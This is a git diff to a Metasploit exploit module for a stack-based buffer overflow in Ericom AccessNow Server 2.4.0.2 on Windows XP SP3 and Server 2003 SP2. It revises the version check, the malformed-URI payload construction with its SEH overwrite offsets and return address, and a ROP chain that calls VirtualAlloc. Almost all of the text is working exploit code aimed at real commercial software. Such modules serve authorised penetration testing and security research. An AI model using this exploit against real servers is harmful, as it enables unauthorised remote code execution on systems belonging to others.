diff --git a/modules/exploits/windows/http/ericom_access_now_bof.rb b/modules/exploits/windows/http/ericom_access_now_bof.rb index cd22d9240d..ab2f23012b 100644 --- a/modules/exploits/windows/http/ericom_access_now_bof.rb +++ b/modules/exploits/windows/http/ericom_access_now_bof.rb @@ -17,7 +17,7 @@ class Metasploit3 < Msf::Exploit::Remote This module exploits a stack based buffer overflow in Ericom AccessNow Server. The vulnerability is due to an insecure usage of vsprintf with used controlled data, which can be triggered with a malformed HTTP request. This module has been tested - successfully with Ericom AccessNow Server 2.4.0 on Windows XP SP3 and Windows 2003 + successfully with Ericom AccessNow Server 2.4.0.2 on Windows XP SP3 and Windows 2003 Server SP2. }, 'Author' => @@ -34,6 +34,7 @@ class Metasploit3 < Msf::Exploit::Remote ], 'Privileged' => true, 'Platform' => 'win', + 'Arch' => ARCH_X86, 'Payload' => { 'Space' => 4096, @@ -43,7 +44,7 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Targets' => [ - [ 'Ericom AccessNow Server 2.4.0 / Windows [XP SP3 / 2003 SP2]', + [ 'Ericom AccessNow Server 2.4.0.2 / Windows [XP SP3 / 2003 SP2]', { 'RopOffset' => 62, 'Offset' => 30668, @@ -63,22 +64,27 @@ class Metasploit3 < Msf::Exploit::Remote 'uri' => '/AccessNow/start.html' }) - if res && res.code == 200 && res.headers['Server'] && res.headers['Server'] =~ /Ericom AccessNow Server/ - return Exploit::CheckCode::Detected + unless res && res.code == 200 && res.headers['Server'] + return Exploit::CheckCode::Safe end - return Exploit::CheckCode::Safe + if res.headers['Server'] =~ /Ericom AccessNow Server/ + return Exploit::CheckCode::Appears # Ericom AccessNow 2.4 + elsif res && res.code == 200 && res.headers['Server'] && res.headers['Server'] =~ /Ericom Access Server/ + return Exploit::CheckCode::Detected # Ericom AccessNow 3 + end + + Exploit::CheckCode::Unknown end def exploit_uri - uri = "A " # To ensure a "malformed request" error message - uri << "C" * (62) + uri = "#{rand_text_alpha(1)} " # To ensure a "malformed request" error message + uri << rand_text(target['RopOffset']) uri << create_rop_chain uri << payload.encoded - print_status("#{Rex::Text.to_hex_dump(payload.encoded)}") - uri << "B" * (0x77cc - uri.length) - uri << "CCCC" #nseh - uri << [0x104da1e5].pack("V") #seh + uri << rand_text(target['Offset'] - uri.length) + uri << rand_text(4) # nseh + uri << [target.ret].pack("V") # seh uri end @@ -96,8 +102,8 @@ class Metasploit3 < Msf::Exploit::Remote # rop chain generated with mona.py - www.corelan.be rop_gadgets = [ - 0x10518867, # RETN # [AccessNowAccelerator32.dll] # Padding to ensure compatibility with all window versions - 0x10518867, # RETN # [AccessNowAccelerator32.dll] # Padding to ensure compatibility with all window versions + 0x10518867, # RETN # [AccessNowAccelerator32.dll] # Padding to ensure it works in both windows 2003 SP2 and XP SP3 + 0x10518867, # RETN # [AccessNowAccelerator32.dll] # Padding to ensure it works in both windows 2003 SP2 and XP SP3 0x10518866, # POP EAX # RETN [AccessNowAccelerator32.dll] 0x105c6294, # ptr to &VirtualAlloc() [IAT AccessNowAccelerator32.dll] 0x101f292b, # MOV EAX,DWORD PTR DS:[EAX] # RETN [AccessNowAccelerator32.dll]